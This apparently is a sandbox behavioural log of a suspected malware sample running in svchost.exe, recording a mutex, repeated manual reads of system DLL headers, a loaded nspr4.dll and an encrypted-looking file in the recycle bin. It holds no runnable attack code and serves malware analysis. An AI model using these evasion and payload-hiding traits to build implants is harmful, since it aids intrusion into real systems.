ProcessorInformation success or wait 40 BAD6959
+ Chronological sections
Operation Data Completion Time
Mutant created Name: \BaseNamedObjects\zXeRY3a_PtW|00000000 success or wait 2033560455
Thread created PID: 1052 TID: 2616 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\svchost.exe Injected: false success or wait 2033571481
Section loaded Path: \KnownDlls\MSIMG32.dll Access: write and read and execute Type: unknown Baseaddress: E30000 Size: 77824 Protection: readonly Mapped to pid: own pid object name not found 2033577878
Section loaded Path: C:\WINDOWS\system32\msimg32.dll Access: query and write and read and execute Type: image Baseaddress: 76380000 Size: 20480 Protection: read write Mapped to pid: own pid success or wait 2033607461
Thread created PID: 1052 TID: 3420 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\svchost.exe Injected: false success or wait 2035754165
Thread delayed Time: 0 TID: 13344 success or wait 2035757825
System info queried Type: BasicInformation success or wait 2035758164
System info queried Type: ProcessorInformation success or wait 2035758701
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2035759813
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 4 Value: D0 00 00 00 success or wait 2035780096
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 20 Value: 4C 01 04 00 7D F2 00 4D 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2035798062
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 D0 07 00 00 3C 03 00 00 00 00 00 F8 20 01 00 00 10 00 00 00 90 07 00 00 00 90 7C 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 20 0B 00 00 04 00 00 30 FD 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 34 00 00 success or wait 2035798982
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 DA CE 07 00 00 10 00 00 00 D0 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 20 4A 00 00 00 E0 07 00 00 32 00 00 00 D4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 78 BE 02 00 00 30 08 00 00 C0 02 00 success or wait 2035816468
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: 1A90000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2035817968
System info queried Type: BasicInformation success or wait 2035819657
System info queried Type: ProcessorInformation success or wait 2035820060
Thread created PID: 1052 TID: 3424 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\svchost.exe Injected: false success or wait 2035823632
Thread created PID: 1052 TID: 3456 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\svchost.exe Injected: false success or wait 2035873879
Thread delayed Time: 0 TID: 13344 success or wait 2035874748
Thread delayed Time: 0 TID: 13344 success or wait 2035874881
System info queried Type: BasicInformation success or wait 2035875044
System info queried Type: ProcessorInformation success or wait 2035875149
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2035875342
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 4 Value: D0 00 00 00 success or wait 2035876461
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 20 Value: 4C 01 04 00 7D F2 00 4D 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2035876692
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 D0 07 00 00 3C 03 00 00 00 00 00 F8 20 01 00 00 10 00 00 00 90 07 00 00 00 90 7C 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 20 0B 00 00 04 00 00 30 FD 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 34 00 00 success or wait 2035876801
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 DA CE 07 00 00 10 00 00 00 D0 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 20 4A 00 00 00 E0 07 00 00 32 00 00 00 D4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 78 BE 02 00 00 30 08 00 00 C0 02 00 success or wait 2035880311
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: 1A90000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2035880616
System info queried Type: BasicInformation success or wait 2035880909
System info queried Type: ProcessorInformation success or wait 2035881026
System info queried Type: BasicInformation success or wait 2036753988
System info queried Type: ProcessorInformation success or wait 2036754218
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2036784844
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 4 Value: D0 00 00 00 success or wait 2036816627
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 20 Value: 4C 01 04 00 7D F2 00 4D 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2036817860
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 D0 07 00 00 3C 03 00 00 00 00 00 F8 20 01 00 00 10 00 00 00 90 07 00 00 00 90 7C 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 20 0B 00 00 04 00 00 30 FD 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 34 00 00 success or wait 2036818089
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 DA CE 07 00 00 10 00 00 00 D0 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 20 4A 00 00 00 E0 07 00 00 32 00 00 00 D4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 78 BE 02 00 00 30 08 00 00 C0 02 00 success or wait 2036818836
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: 1A90000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2036820043
System info queried Type: BasicInformation success or wait 2036820677
System info queried Type: ProcessorInformation success or wait 2036821075
System info queried Type: BasicInformation success or wait 2036848861
System info queried Type: ProcessorInformation success or wait 2036849780
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2036850400
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 4 Value: D0 00 00 00 success or wait 2036874283
Thread delayed Time: 0 TID: 13344 success or wait 2036874595
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 20 Value: 4C 01 04 00 7D F2 00 4D 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2036876283
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 D0 07 00 00 3C 03 00 00 00 00 00 F8 20 01 00 00 10 00 00 00 90 07 00 00 00 90 7C 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 20 0B 00 00 04 00 00 30 FD 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 34 00 00 success or wait 2036877356
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 DA CE 07 00 00 10 00 00 00 D0 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 20 4A 00 00 00 E0 07 00 00 32 00 00 00 D4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 78 BE 02 00 00 30 08 00 00 C0 02 00 success or wait 2036878201
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: 1A90000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2036879051
System info queried Type: BasicInformation success or wait 2037987554
Thread delayed Time: 0 TID: 13344 success or wait 2037988057
System info queried Type: ProcessorInformation success or wait 2038029695
Thread delayed Time: 0 TID: 13344 success or wait 2038031244
Thread delayed Time: 0 TID: 13344 success or wait 2038031959
System info queried Type: BasicInformation success or wait 2038039189
System info queried Type: ProcessorInformation success or wait 2038039879
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2038041078
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 4 Value: D0 00 00 00 success or wait 2038044535
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 20 Value: 4C 01 04 00 7D F2 00 4D 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2038046402
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 D0 07 00 00 3C 03 00 00 00 00 00 F8 20 01 00 00 10 00 00 00 90 07 00 00 00 90 7C 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 20 0B 00 00 04 00 00 30 FD 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 34 00 00 success or wait 2038046990
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 DA CE 07 00 00 10 00 00 00 D0 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 20 4A 00 00 00 E0 07 00 00 32 00 00 00 D4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 78 BE 02 00 00 30 08 00 00 C0 02 00 success or wait 2038050637
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: 1A90000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2038052765
System info queried Type: BasicInformation success or wait 2038072550
System info queried Type: ProcessorInformation success or wait 2038073507
Section loaded Path: \KnownDlls\nspr4.dll Access: write and read and execute Type: unknown Baseaddress: 1A90000 Size: 65536 Protection: readonly Mapped to pid: own pid object name not found 2038120442
File opened Path: C:\Recycle.Bin\07A49F015E0D693 Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false success or wait 2038123298
File read Path: C:\Recycle.Bin\07A49F015E0D693 Offset: none Length: 5934 Value: 50 D7 96 D6 A6 EA BF F3 B7 FB 7B 65 8A 85 C9 85 C9 85 C9 85 C9 85 D8 95 D9 95 D3 9F FC B0 5F 82 BC 6E 9B 4E 30 D8 75 A5 B6 46 1F 53 16 3C E9 D5 6F 23 7C CC 40 C7 5F 13 5B 25 68 B6 F4 00 4A FB D0 8B 29 AA 5C 07 EB F8 69 F9 3F A6 F2 9C 1F 0D EA 9E F6 D2 0B 00 8E C4 6C EF 48 BA B7 4B DA AD F9 82 10 28 success or wait 2038126818
Thread delayed Time: 0 TID: 13344 success or wait 2041020788
Thread delayed Time: 0 TID: 13344 success or wait 2041022327
Thread delayed Time: 0 TID: 13344 success or wait 2041024152
System info queried Type: BasicInformation success or wait 2041076893
System info queried Type: ProcessorInformation success or wait 2041077536
File opened Path: C:\WINDOWS\system32\USER32.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2041078309
File read Path: C:\WINDOWS\system32\user32.dll Offset: none Length: 4 Value: D8 00 00 00 success or wait 2041081615
File read Path: C:\WINDOWS\system32\user32.dll Offset: none Length: 20 Value: 4C 01 04 00 1B A1 02 48 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2041083667
File read Path: C:\WINDOWS\system32\user32.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 F4 05 00 00 E2 02 00 00 00 00 00 17 B2 00 00 00 10 00 00 00 B0 05 00 00 00 41 7E 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 00 00 00 00 00 00 00 10 09 00 00 04 00 00 76 FC 08 00 02 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 39 00 00 success or wait 2041084451
File read Path: C:\WINDOWS\system32\user32.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 83 F2 05 00 00 10 00 00 00 F4 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 80 11 00 00 00 10 06 00 00 0C 00 00 00 F8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 88 A0 02 00 00 30 06 00 00 A2 02 00 success or wait 2041087510
Section loaded Path: C:\WINDOWS\system32\user32.dll Access: query and read Type: commit Baseaddress: 1A90000 Size: 57344 Protection: readonly Mapped to pid: own pid success or wait 2041088986
System info queried Type: BasicInformation success or wait 2041109446
System info queried Type: ProcessorInformation success or wait 2041110194
System info queried Type: BasicInformation success or wait 2041128277
System info queried Type: ProcessorInformation success or wait 2041128824
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2041131997
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2042279239
Thread delayed Time: 0 TID: 13344 success or wait 2042279745
Thread delayed Time: 0 TID: 13344 success or wait 2042280716
Thread delayed Time: 0 TID: 13344 success or wait 2042303007
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2042304255
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2042304662
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2042305647
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: 1A90000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2042307248
System info queried Type: BasicInformation success or wait 2042307796
System info queried Type: ProcessorInformation success or wait 2042308203
System info queried Type: BasicInformation success or wait 2042315567
System info queried Type: ProcessorInformation success or wait 2042315670
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2042315840
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2042316717
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2042317584
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2042342590
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2042343418
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: 1A90000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2042366333
System info queried Type: BasicInformation success or wait 2042367741
System info queried Type: ProcessorInformation success or wait 2042368154
System info queried Type: BasicInformation success or wait 2042977313
System info queried Type: ProcessorInformation success or wait 2042977587
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2042977854
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2042979002
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2042980185
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2042980438
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2042981461
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: 1A90000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2042982022
System info queried Type: BasicInformation success or wait 2042983247
System info queried Type: ProcessorInformation success or wait 2042983511
System info queried Type: BasicInformation success or wait 2043010182
System info queried Type: ProcessorInformation success or wait 2043010443
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2043032678
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2043033397
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2043034604
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2043034961
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2046819552
Thread delayed Time: 0 TID: 13344 success or wait 2046819806
Thread delayed Time: 0 TID: 13344 success or wait 2046820793
Thread delayed Time: 0 TID: 13344 success or wait 2046821493
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: 1A90000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2046822415
System info queried Type: BasicInformation success or wait 2046845198
System info queried Type: ProcessorInformation success or wait 2046845786
File opened Path: C:\Recycle.Bin\07A49F015E0D693 Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false success or wait 2046848057
File read Path: C:\Recycle.Bin\07A49F015E0D693 Offset: none Length: 5934 Value: 50 D7 96 D6 A6 EA BF F3 B7 FB 7B 65 8A 85 C9 85 C9 85 C9 85 C9 85 D8 95 D9 95 D3 9F FC B0 5F 82 BC 6E 9B 4E 30 D8 75 A5 B6 46 1F 53 16 3C E9 D5 6F 23 7C CC 40 C7 5F 13 5B 25 68 B6 F4 00 4A FB D0 8B 29 AA 5C 07 EB F8 69 F9 3F A6 F2 9C 1F 0D EA 9E F6 D2 0B 00 8E C4 6C EF 48 BA B7 4B DA AD F9 82 10 28 success or wait 2046849806
System info queried Type: BasicInformation success or wait 2046856457
System info queried Type: ProcessorInformation success or wait 2046857009
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2046857271
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2046883626
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2046884238
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2046908380
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2046909071
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: 1A90000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2046910200
System info queried Type: BasicInformation success or wait 2046912219
System info queried Type: ProcessorInformation success or wait 2046912518
Thread delayed Time: 0 TID: 13344 success or wait 2048439751
Thread delayed Time: 0 TID: 13344 success or wait 2048440740
Thread delayed Time: 0 TID: 13344 success or wait 2048441950
System info queried Type: BasicInformation success or wait 2048466290
System info queried Type: ProcessorInformation success or wait 2048466509
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2048466836
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2048467820
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2048469002
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2048469252
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2048470241
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: 1A90000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2048470808
System info queried Type: BasicInformation success or wait 2048472170
System info queried Type: ProcessorInformation success or wait 2048472464
System info queried Type: BasicInformation success or wait 2048498818
System info queried Type: ProcessorInformation success or wait 2048499083
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2048594618
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2048595366
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2048597190
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2048597445
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2048598144
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: 1A90000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2049074467
System info queried Type: BasicInformation success or wait 2049075192
System info queried Type: ProcessorInformation success or wait 2049075728
System info queried Type: BasicInformation success or wait 2049078221
System info queried Type: ProcessorInformation success or wait 2049078782
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2049079052
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2049080392
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2049080927
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2049081461
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2049082064
